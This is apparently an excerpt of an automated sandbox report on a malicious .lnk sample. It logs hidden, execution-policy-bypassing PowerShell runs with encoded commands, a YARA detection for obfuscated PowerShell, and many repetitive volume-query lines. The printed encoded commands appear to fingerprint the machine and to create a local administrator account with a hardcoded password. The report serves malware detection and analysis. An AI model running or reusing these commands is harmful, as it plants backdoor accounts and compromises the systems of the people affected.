adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagadJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=

      Language, Device and Operating System Detection

      barindex
      Yara detected Obfuscated Powershell
      Source: Yara matchFile source: eQwUFcwrXk.lnk, type: SAMPLE
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
